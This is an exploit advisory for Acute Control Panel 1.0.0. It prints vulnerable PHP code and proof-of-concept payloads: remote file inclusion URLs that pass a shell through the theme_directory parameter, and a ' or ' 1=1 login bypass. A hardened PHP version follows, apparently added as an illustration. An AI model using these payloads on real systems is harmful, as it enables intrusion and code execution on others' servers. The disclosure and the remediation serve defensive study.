Acute Control Panel 1.0.0 SQLRFI Multiple Remote Vulnerabilities

###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

  Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

  PoC :

   http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

  PoC :

   http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

  Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

  PoC :

   Username : admin ' or ' 1=1
   Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]
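A hardened counterpart to the two vulnerable patterns above (the request-controlled include path and the string-built login query), added here as an illustration and not code from Acute Control Panel or the advisory: the include path is resolved from a whitelist under a fixed theme directory, and the login query is a prepared statement. The directory layout, theme names, hashed password storage and the $pdo connection are assumptions.

```php
<?php
// Added illustration, not Acute Control Panel code: hardened forms of the
// two patterns in the advisory (request-controlled include path and a
// string-built login query). Paths, theme names and $pdo are assumptions.

// 1. Theme include: request data never reaches include_once directly. The
//    theme name must be on a whitelist and the resolved file must stay under
//    THEME_BASE, so a remote URL or a %00-truncated path cannot be included.
define('THEME_BASE', __DIR__ . '/themes');
const ALLOWED_THEMES = ['default', 'dark'];

function theme_file(string $requested, string $file): string
{
    if (!in_array($requested, ALLOWED_THEMES, true)) {
        $requested = 'default';          // unknown name: fall back, do not echo it
    }
    $base = realpath(THEME_BASE);
    $path = realpath(THEME_BASE . '/' . $requested . '/' . $file);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('theme file not found');
    }
    return $path;
}

$theme = isset($_GET['theme']) ? (string) $_GET['theme'] : 'default';
include_once theme_file($theme, 'sidebar.php');   // e.g. themes/default/sidebar.php

// 2. Login: a prepared statement keeps "admin ' or ' 1=1" as data, not SQL,
//    and the password is checked against a stored hash instead of being
//    interpolated into the query (hashed storage is an assumption here).
function authenticate(PDO $pdo, string $username, string $password): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password, email, fullname, permissions
           FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;                     // unknown user or wrong password
    }
    unset($row['password']);
    return $row;
}
```

With the whitelist in place, the `theme_directory` parameter from the PoC URLs has no path to `include_once`, and the injected quote in the login PoC is bound as a literal username value.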
SirGod                                                                                  03/26/2009